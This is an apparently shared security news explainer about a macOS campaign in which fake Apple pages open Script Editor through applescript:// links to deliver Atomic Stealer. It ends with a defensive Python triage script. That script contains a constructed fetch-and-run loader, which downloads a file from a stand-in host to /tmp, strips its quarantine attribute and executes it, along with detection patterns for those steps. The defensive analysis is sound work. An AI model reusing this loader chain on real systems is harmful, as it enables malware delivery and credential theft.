macOS script exploit spreads Atomic Stealer

A new macOS campaign uses fake Apple websites with applescript:// links that lure users into opening Script Editor with a pre-filled script; running it delivers Atomic Stealer, a payload that targets Keychain entries, crypto wallets, passwords and cookies. The attack reportedly sidesteps the Terminal paste warning added in macOS 26.4 by routing the obfuscated AppleScript stages through Script Editor instead. (x.com)

A Mac can run little automation scripts the way a kitchen can run timers and appliances, and Apple ships a built-in app called Script Editor for that job. In this campaign, attackers stop asking people to paste commands into Terminal and instead push them into Script Editor, which feels more official because it is already on every Mac. (jamf.com)

The trick starts on fake Apple-themed pages that claim they can help “reclaim disk space on your Mac.” When a victim clicks an “Execute” button, the page uses the `applescript://` link format to ask the browser to open Script Editor with code already filled in. (jamf.com) That changes one small but important step in the scam. Instead of making the victim copy a command into Terminal by hand, the attackers move the victim from a webpage into a pre-populated script window that is one click from running. (jamf.com)

Apple had already added a speed bump in macOS Tahoe 26.4 for the older version of this scam by warning when pasted Terminal commands are about to run. Jamf says this newer chain gets around that specific friction point because Script Editor, not Terminal, becomes the launch pad. (jamf.com, support.apple.com)

Behind the window dressing, the script runs an obfuscated `curl | zsh` command, which is the Unix equivalent of telling your computer to fetch instructions from the internet and execute them immediately. BleepingComputer reports that the stages include a base64-and-gzip encoded payload that is decoded in place, a download into `/tmp/helper`, and an `xattr -c` command that strips the file's extended attributes, including the `com.apple.quarantine` flag that would otherwise trigger a Gatekeeper check, before it is executed. (bleepingcomputer.com)

The final payload is Atomic macOS Stealer, usually shortened to Atomic Stealer or AMOS, a commercial information-stealing malware family first documented in April 2023. SentinelOne reported that its operators advertised access through Telegram for about $1,000 per month, which helps explain why the same malware keeps showing up behind different lures. (sentinelone.com, thehackernews.com)

What it steals is the digital equivalent of a thief emptying every unlocked drawer in one pass. Jamf and Moonlock say Atomic Stealer goes after Keychain data, browser passwords, cookies, autofill data, stored credit cards, desktop files, and cryptocurrency wallet data from both browser extensions and desktop wallet apps. (jamf.com, moonlock.com)

Apple's built-in defenses still exist, and Apple says macOS relies on Gatekeeper, notarization, and XProtect to block or remove known malware. The problem in attacks like this is not that those layers vanished, but that the first move comes from a user approving a trusted built-in app to open and run something that looks like routine maintenance; once quarantine has been stripped and the script is running with the user's own privileges, those layers have little left to inspect. (support.apple.com, jamf.com)

The safest rule is simple and boring: if a website tells you to fix your Mac by clicking “Execute,” opening Script Editor, or running code you did not write, close the tab. Jamf's advice for this campaign is to treat Script Editor prompts as high risk and use Apple's own support material, not random cleanup guides, when your Mac says it is low on space. (jamf.com, support.apple.com)
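As an added example (not code from the page, Jamf, BleepingComputer or the malware authors), the following Python triage helper shows the mechanics described above from the defender's side: it pulls `applescript://` links out of saved page HTML, recovers the AppleScript such a link would pre-fill in Script Editor, peels the `echo <blob> | base64 -d | gunzip` layering, and flags the fetch-and-pipe-to-shell, `/tmp` drop and `xattr -c` patterns. The sample page, the `example.invalid` domain and the payload text are constructed for the demonstration; the query layout of the `applescript://` link (host `com.apple.scripteditor`, `action=new`, `script=`) is my understanding of Apple's scheme and should be treated as an assumption.

```python
import base64
import binascii
import gzip
import html
import re
from urllib.parse import parse_qs, quote, urlparse

# Constructed sample, not captured from the campaign. The link layout
# (com.apple.scripteditor, action=new, script=<percent-encoded AppleScript>)
# is assumed; the inner stage mirrors the reported steps but points at a
# reserved .invalid domain so nothing resolves if it is ever pasted anywhere.
INNER_STAGE = (
    b"curl -fsSL https://example.invalid/helper -o /tmp/helper "
    b"&& xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper\n"
)
_BLOB = base64.b64encode(gzip.compress(INNER_STAGE)).decode()
SAMPLE_SCRIPT = f'do shell script "echo {_BLOB} | base64 -d | gunzip | zsh"'
SAMPLE_HTML = (
    "<p>Reclaim disk space on your Mac.</p>\n"
    '<a href="applescript://com.apple.scripteditor?action=new&amp;script='
    + quote(SAMPLE_SCRIPT)
    + '">Execute</a>\n'
)

LINK_RE = re.compile(r'href\s*=\s*["\'](applescript://[^"\']+)["\']', re.I)
# One `echo <base64> | base64 -d` layer; the loop below peels them repeatedly.
ECHO_B64_RE = re.compile(r"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+(?:-d|-D|--decode)\b")

# Patterns that match the chain reported for this campaign.
INDICATORS = {
    "do_shell_script": re.compile(r"\bdo shell script\b"),
    "pipe_to_shell": re.compile(r"\|\s*(?:zsh|bash|sh)\b"),
    "remote_fetch": re.compile(r"\bcurl\b"),
    "b64_stage": re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b"),
    "tmp_drop": re.compile(r"/tmp/\S+"),
    "strip_xattrs": re.compile(r"\bxattr\s+-c\b"),
}
MAX_DEPTH = 8  # guard against a stage that re-encodes itself forever


def extract_links(page: str) -> list[str]:
    """Return every applescript:// href in the page, with HTML entities undone."""
    return [html.unescape(m) for m in LINK_RE.findall(page)]


def script_from_link(url: str) -> str:
    """Return the AppleScript the link would pre-fill (parse_qs percent-decodes it)."""
    return parse_qs(urlparse(url).query).get("script", [""])[0]


def unpack_stages(script: str) -> list[str]:
    """Peel nested echo|base64 -d[|gunzip] layers; outermost stage first."""
    stages = [script]
    match = ECHO_B64_RE.search(script)
    while match and len(stages) < MAX_DEPTH:
        try:
            blob = base64.b64decode(match.group(1), validate=True)
            if blob[:2] == b"\x1f\x8b":  # gzip magic: decompress before treating as text
                blob = gzip.decompress(blob)
        except (binascii.Error, OSError, EOFError):
            break  # not a decodable stage; stop peeling, keep what we have
        inner = blob.decode("utf-8", "replace")
        stages.append(inner)
        match = ECHO_B64_RE.search(inner)
    return stages


def triage(page: str) -> list[dict]:
    """For each applescript:// link, report its unpacked stages and matched indicators."""
    findings = []
    for url in extract_links(page):
        stages = unpack_stages(script_from_link(url))
        hits = sorted(
            name for name, rx in INDICATORS.items() if any(rx.search(s) for s in stages)
        )
        findings.append({"url": url, "stages": stages, "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_HTML):
        print("link:", finding["url"][:64] + "...")
        print("indicators:", ", ".join(finding["indicators"]))
        for depth, stage in enumerate(finding["stages"]):
            print(f"stage {depth}: {stage.strip()[:110]}")
```

Run it against a saved copy of a suspicious page (`triage(open("page.html").read())`) rather than by clicking anything: the point of the helper is that the `script=` parameter is plain text a browser hands to Script Editor, so the whole chain can be read and unwrapped without ever executing it. The indicator list is deliberately simple; a real deployment would pair it with the page's domain and the decoded stage's download URL for blocking.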


Shared from Scout - Be the smartest in the room.